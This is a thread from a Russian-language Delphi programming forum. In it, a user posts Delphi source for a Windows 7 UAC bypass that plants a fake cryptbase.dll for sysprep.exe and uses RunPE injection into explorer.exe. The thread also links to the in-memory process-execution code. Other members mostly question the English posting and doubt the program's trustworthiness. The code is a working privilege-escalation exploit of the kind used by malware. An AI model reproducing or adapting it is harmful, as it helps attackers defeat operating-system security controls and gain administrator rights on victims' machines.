Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 11.04.2014, 19:24   #1
Delphi.Coder
Пользователь
 
Регистрация: 09.04.2014
Сообщений: 13
По умолчанию UAC Bypass (Working)

Found a great way to bypass UAC, Tested on Windows 7 x86.

Just wanted to share, Take a look at the .txt, It was to many characters for me to post

This RunPE is necessary (uExecFromMem): http://www.delphibasics.info/home/de...n7x64bytestest
Вложения
Тип файла: txt UAC.txt (27.4 Кб, 186 просмотров)

Последний раз редактировалось Delphi.Coder; 11.04.2014 в 20:06.
Delphi.Coder вне форума Ответить с цитированием
Старый 11.04.2014, 20:52   #2
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Почему не на русском языке? Форум русскоязычный же.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 11.04.2014, 21:12   #3
Delphi.Coder
Пользователь
 
Регистрация: 09.04.2014
Сообщений: 13
По умолчанию

Im sorry man, Its just i find these russian forums more helpful than american forums. I just wanted to share it with you guys, its new. i only speak a little russian

Им жаль мужчина, Его просто я нахожу эти русские форумов более полезным, чем американских форумах. Я просто хотел поделиться им с вами, ребята, его новая. я только немного говорю по России
Delphi.Coder вне форума Ответить с цитированием
Старый 11.04.2014, 21:54   #4
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Хм. Ну в общем на всякий случай будь готов к тому что тебя не поймут.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 12.04.2014, 01:27   #5
Delphi.Coder
Пользователь
 
Регистрация: 09.04.2014
Сообщений: 13
По умолчанию

О нет, ее очень легко понять. Исходный код рецептура..не русский. Bablon помогает мне на вещи, на которые я надзирательница еще. Но обмен мгновенными сообщениями с помощью Rosetta stone сейчас и узнайте российская

Последний раз редактировалось Delphi.Coder; 12.04.2014 в 01:35.
Delphi.Coder вне форума Ответить с цитированием
Старый 12.04.2014, 01:40   #6
Delphi.Coder
Пользователь
 
Регистрация: 09.04.2014
Сообщений: 13
По умолчанию

Цитата:
Сообщение от Delphi.Coder Посмотреть сообщение
Found a great way to bypass UAC, Tested on Windows 7 x86.

Just wanted to share, Take a look at the .txt, It was to many characters for me to post

This RunPE is necessary (uExecFromMem): http://www.delphibasics.info/home/de...n7x64bytestest


Код:
Function mFileToStr(Ruta: ansistring): ansistring;
var
  sFile: HFile;
  uBytes: Cardinal;
begin
  Result:= '';
  sFile := _lopen(PansiChar(Ruta), OF_READ);
  uBytes := GetFileSize(sFile, nil);
  SetLength(Result, uBytes);
  _lread(sFile, @Result[1], uBytes);
  _lclose(sFile);
end;

Procedure mWriteFileFromStr(Cadena, Ruta: ansistring);
var
  sFile: HFile;
  uBytes: Cardinal;
begin
  sFile := _lcreat(PansiChar(Ruta), 0);
  uBytes := Length(Cadena);
  _lwrite(sFile, @Cadena[1], uBytes);
  _lclose(sFile);
end;

function IsUserAnAdmin: integer; external 'shell32';

Function Bypass: bool;
var
  Yo: ansistring;
  DllD: ansistring;
  psinfo: pshellexecuteinfow;
  tmpdir: array [0..MAX_PATH] of char;
  windir: array [0..MAX_PATH] of char;
  sysdir: array [0..MAX_PATH] of char;
  tmp: string;
  sys: string;
  win: string;
  sysprp: string;
begin
  Result:= False;
  GetTempPath(MAX_PATH, tmpdir);
  GetSystemDirectory(sysdir, MAX_PATH);
  GetWindowsDirectory(windir, MAX_PATH);
  win:= windir + '\explorer.exe';
  sys:= sysdir + '\sysprep\cryptbase.dll';
  sysprp:= sysdir + '\sysprep\sysprep.exe';
  tmp := tmpdir + 'cryptbase.dll';

  if isuseranadmin = 1  then
    begin
      Result:= True;
      while fileexists(sys) do
        deletefile(sys);
      deletefile(tmp);
    end
    else
    begin
      if ansiuppercase(ExtractFileName(paramstr(0))) <> 'EXPLORER.EXE' then
        begin
          Yo:= mfiletostr(paramstr(0));
          SetLength(DllD, SizeOf(DllDummy));
          CopyMemory(@DllD[1], @DllDummy[0], SizeOf(DllDummy));
          mWriteFileFromStr(DllD, tmp);
          ExecuteFromMem(win, paramstr(0), @FOp[0]);
          ExecuteFromMem(win, paramstr(0), @Yo[1]);
          exitprocess(0);
        end
        else
        begin
          New(psInfo);
          psinfo.cbSize:= sizeof(shellexecuteinfo);
          psinfo.fMask:= SEE_MASK_INVOKEIDLIST;
          psinfo.lpVerb:= 'open';
          PSINFO.lpFile:= PCHAR(sysprp);
          psinfo.lpParameters:= pchar(paramstr(1));
          psinfo.nShow:= SW_SHOWNORMAL;
          shellexecuteexw(psinfo);
          exitprocess(0);
        end;
    end;
end;
Вложения
Тип файла: txt russian uac.txt (45.2 Кб, 167 просмотров)
Тип файла: txt UAC.txt (27.4 Кб, 153 просмотров)
Delphi.Coder вне форума Ответить с цитированием
Старый 12.04.2014, 02:20   #7
XE5
Заблокирован
 
Регистрация: 02.03.2014
Сообщений: 439
По умолчанию

Delphi.Coder
russian uac.txt
Цитата:
???? Unit1 ;

?????????

?????????????
Winapi.Windows , Winapi.Messages , System.SysUtils , System.Variants , System.Classes , Vcl.Graphics ,
Vcl.Controls , Vcl.Forms , Vcl.Dialogs , Vcl.StdCtrls , uexecfrommem , winapi.ShellAPI ;
XE5 вне форума Ответить с цитированием
Старый 12.04.2014, 11:40   #8
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Что-то эта программа доверия не внушает.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 12.04.2014, 19:52   #9
Delphi.Coder
Пользователь
 
Регистрация: 09.04.2014
Сообщений: 13
По умолчанию

почему вы говорите, что друг?
Delphi.Coder вне форума Ответить с цитированием
Старый 12.04.2014, 20:02   #10
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Цитата:
что друг?
What?
.....
I'm learning to live...
Stilet вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
UAC, автозагрузка и ПО Человек_Борща Win Api 14 28.10.2013 23:30
CreateProcess и UAC XeruH Общие вопросы Delphi 0 02.04.2013 22:16
Delphi vs UAC dyonysos Общие вопросы Delphi 0 02.05.2010 20:02